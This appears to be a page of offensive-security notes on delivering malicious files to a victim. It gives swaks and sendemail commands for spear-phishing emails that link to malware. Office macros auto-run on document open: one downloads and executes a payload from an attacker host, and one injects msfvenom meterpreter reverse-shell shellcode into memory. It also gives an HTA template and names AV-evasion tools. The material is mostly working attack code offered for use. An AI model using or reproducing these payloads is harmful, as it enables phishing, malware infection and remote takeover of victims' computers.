This section contains several ways to infect a victim by sending a malicious file.
Sending emails
In case you are performing spear phishing, you can use the following commands to send the phishing email.
swaks-t<VICTIM_EMAIL>-f<YOUR_FAKE_EMAIL>--server<SMTP_EMAIL>--body'click me http://<YOUR_IP>/<MALWARE>'--header"Subject: Important"--add-header"Really: 1.0"--add-header"Content-Type: text/html" [--attach <ATTACHED_FILE>]sendemail-t<VICTIM_EMAIL>-f<YOUR_FAKE_EMAIL>-s<SMTP_EMAIL>-m"click me http://<YOUR_IP>/<MALWARE>"-u"Important!!!" [-a <ATTACHED_FILE>]
HTML Smuggling
This technique consists of attackers embedding malicious files into HTML or JavaScript code within seemingly harmless files or documents. In this case, the attacker will base64 encode its malicious file and add it into an HTML file. Then, once the victim accesses the HTML file, the malicious file will be downloaded into the machine, but it won't be executed unless the attacker tricks the victim into doing so.
Thanks to Microsoft Office document macros, they can be used to infect the victim's computer in several ways.
File Dropper
Waits two seconds (Wait (2)) for the file to be downloaded and then it is executed.
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
Sub Wait(n As Long)
Dim t As Date
t = Now
Do
DoEvents
Loop Until Now >= DateAdd("s", n, t)
End Sub
Sub MyMacro()
If ActiveDocument.Name <> "runner.doc" Then
Exit Sub
End If
Dim str As String
str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://<YOUR_IP>/met.exe','met.exe')"
Shell str, vbHide
Dim exePath As String
exePath = ActiveDocument.path + "\met.exe"
Wait (2)
Shell exePath, vbHide
End Sub
Win32Runner
The following macro allocates the Metasploit's assembly code into memory and then executes it. However, there is a caveat because if the victim closes Office the reverse shell will be closed, so you need to migrate the reverse shell to another process.
#If VBA7 Then
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As LongPtr, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As LongPtr, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As LongPtr) As LongPtr
#Else
Private Declare Function CreateThread Lib "KERNEL32" Alias "CreateThread" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As Long, ThreadParameter As Long, ByVal CreateFlags As Long, ByRef ThreadId As Long) As Long
Private Declare Function VirtualAlloc Lib "KERNEL32" Alias "VirtualAlloc" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function RtlMoveMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal lDestination As Long, ByRef sSource As Any, ByVal lLength As Long) As Long
#End If
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
Function MyMacro()
Dim buf As Variant
Dim addr As LongPtr
Dim counter As Long
Dim data As Long
If ActiveDocument.Name <> "runner.doc" Then
Exit Function
End If
' msfconsole -x "use multi/handler; set payload windows/meterpreter/reverse_https; setg LHOST 0.0.0.0; setg EXITFUNC thread; set LPORT 443; set AutoRunScript 'migrate -n explorer.exe'; exploit -j"
' msfvenom -p windows/meterpreter/reverse_https LHOST=<YOUR_IP> LPORT=443 EXITFUNC=thread -f powershell -v buf | tr -d '\n' | xclip -sel clipboard
buf = Array(<MSFVENOM_PAYLOAD>)
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
For counter = LBound(buf) To UBound(buf)
data = buf(counter)
res = RtlMoveMemory(addr + counter, data, 1)
Next counter
res = CreateThread(0, 0, addr, 0, 0, 0)
End Function
Win32Runner - BadAssMacros (Tool)
The BadAsssMacros is a tool used to generate malicious macros leveraging techniques like VBA Purging and Shellcode Obfuscation to evade AV engines. Nonetheless, it only works on x86 office. For x64 instances, you need to change the generated as stated in the repository.
HTA
A .hta (HTML Application) file is a type of file format used in Windows to create applications with an HTML and scripting language-based user interface. .hta files are executed using the Microsoft HTML Application Host (mshta.exe) rather than a web browser. They allow developers to create standalone applications that can have a graphical user interface (GUI) using HTML, CSS, and JavaScript.
Thus, based on the previous information, you can create your own .hta that will run your malicious code.
<html><head> <scriptlanguage="JScript">var shell =newActiveXObject("WScript.Shell");var res =shell.Run('<YOUR_MALICIOUS_COMMAND>'); </script></head><body> <scriptlanguage="JScript">self.close(); </script></body></html>
HTA - DotNetToJScript
The DotNetToJScript tool generates a JScript which bootstraps an arbitrary .NET Assembly and class.
Modify ExampleAssembly.cs to obtain a reverse shell with Metasploit and compile the project.